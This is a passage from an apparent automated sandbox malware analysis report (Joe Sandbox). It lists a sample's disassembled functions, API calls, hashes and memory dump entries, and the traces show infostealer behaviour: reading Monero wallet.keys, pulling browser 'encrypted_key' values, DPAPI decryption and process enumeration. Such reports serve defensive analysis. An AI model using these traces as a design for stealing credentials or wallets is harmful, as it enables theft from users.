                                • Instruction Fuzzy Hash: 6EE105728101199BDB04FBA4DCA9EEE7738BF94301F50825AF91772091EF346A4DCB66
                                Function 0054D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0107B548,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D481
                                • lstrlen.KERNEL32(00000000), ref: 0054D698
                                • lstrlen.KERNEL32(00000000), ref: 0054D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 0054D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                                • Instruction ID: bb55c24b0563f19868464467eb3b8617c289e58c8a48576a330db8ca67d68301
                                • Opcode Fuzzy Hash: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                                • Instruction Fuzzy Hash: 7E91F3729101199BDB04FBA4DC6ADEE7B38BF94301F50825AF90766091EF346A0DCB66
                                Function 0054D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0107B548,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D801
                                • lstrlen.KERNEL32(00000000), ref: 0054D99F
                                • lstrlen.KERNEL32(00000000), ref: 0054D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 0054DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                                • Instruction ID: 90d356ce6535db78ddb3e5459bf64d55bb91af62d0eb9e9704fdaf298da1c2e4
                                • Opcode Fuzzy Hash: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                                • Instruction Fuzzy Hash: 0581E3729101199BDB04FBA4DC6ADEE7B38BF94301F50461AF907A6091FF346A0DCB66
                                Function 0054F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                                  • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                                  • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                                  • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                                  • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                                  • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                                  • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00561580,00560D92), ref: 0054F54C
                                • lstrlen.KERNEL32(00000000), ref: 0054F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                                • Instruction ID: 69d75cf741c8010d092ac5da7bc7713bcca57574e9c3c40cf811166c58df3f1e
                                • Opcode Fuzzy Hash: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                                • Instruction Fuzzy Hash: AD51F371D10109AADB04FBA4DC6ADED7B78BF94301F408629FC1667195EE346A0DCBA2
                                Function 005570D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                Download Yara Rule
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0055718C
                                • sU, xrefs: 005572AE, 00557179, 0055717C
                                • sU, xrefs: 00557111
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: sU$sU$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 3722407311-2944379081
                                • Opcode ID: 628cf38e1489e28e94e024924e4edc94a257487370c623c18e2fb34760a7689d
                                • Instruction ID: 4f4269a994f32e89b430b0e16e567bcd37b5037d41759df909b4c5f79b25329c
                                • Opcode Fuzzy Hash: 628cf38e1489e28e94e024924e4edc94a257487370c623c18e2fb34760a7689d
                                • Instruction Fuzzy Hash: 2E5180B0C0420D9BDB14EB90DCA9BEEBB74BF58305F5041AAE90577181EB742E88CF55
                                Function 00553560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 20b75bdd844baadd21d38d2daad3a1dc92440c32a4568a57e0d41ed7fa4c9ca2
                                • Instruction ID: 3873217021dcd9e2210780a9b1923179964d6fc3fa5662912f7e0f6f00a14318
                                • Opcode Fuzzy Hash: 20b75bdd844baadd21d38d2daad3a1dc92440c32a4568a57e0d41ed7fa4c9ca2
                                • Instruction Fuzzy Hash: B4416071D10109EBCB04EFE4D865AEEBB74FF54305F10851AE81677290EB74AA09CFA2
                                Function 00549CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                                  • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                                  • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                                  • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                                  • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                                  • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                                  • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                                  • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                                  • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                                  • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                                  • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                                  • Part of subcall function 00549B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                                  • Part of subcall function 00549B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                                  • Part of subcall function 00549B60: LocalFree.KERNEL32(?), ref: 00549BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 6da91b09d92169e7577e5517575ce9fe2219bff619c2bcda5d8571abaa121c60
                                • Instruction ID: fba75f9970abfc2800050d8a4f0904f3c38466552417d50965ed11de2dc02760
                                • Opcode Fuzzy Hash: 6da91b09d92169e7577e5517575ce9fe2219bff619c2bcda5d8571abaa121c60
                                • Instruction Fuzzy Hash: D83124B5D10209ABDF14DFE4DC96EEFBBB8BF88304F144519E905A7241EB349A04CBA5
                                Function 00558680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005605B7), ref: 005586CA
                                • Process32First.KERNEL32(?,00000128), ref: 005586DE
                                • Process32Next.KERNEL32(?,00000128), ref: 005586F3
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • CloseHandle.KERNEL32(?), ref: 00558761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                                • Instruction ID: 69418c66d48af56909c3f3ebe07d03f2d9dcaf19793ec767346d2dbd578380b9
                                • Opcode Fuzzy Hash: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                                • Instruction Fuzzy Hash: 69316F71911119ABDB24DF50CC65FEEBB78FB49701F10429AE90AA21A0DB346A49CFA1
                                Function 00557980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E00,00000000,?), ref: 005579B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 005579B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00560E00,00000000,?), ref: 005579C4
                                • wsprintfA.USER32 ref: 005579F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                                • Instruction ID: 83dcc30871bcf1bd2f13c33be32feef1444f6ac2b1d1a96f59e62398c51665cd
                                • Opcode Fuzzy Hash: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                                • Instruction Fuzzy Hash: 3C1118B2944118AADB149FC9DD45BBEBBF8FB4CB11F10411AF605A2280E23D5940CBB5
                                Function 0055C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 0055C74E
                                  • Part of subcall function 0055BF9F: __amsg_exit.LIBCMT ref: 0055BFAF
                                • __getptd.LIBCMT ref: 0055C765
                                • __amsg_exit.LIBCMT ref: 0055C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0055C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
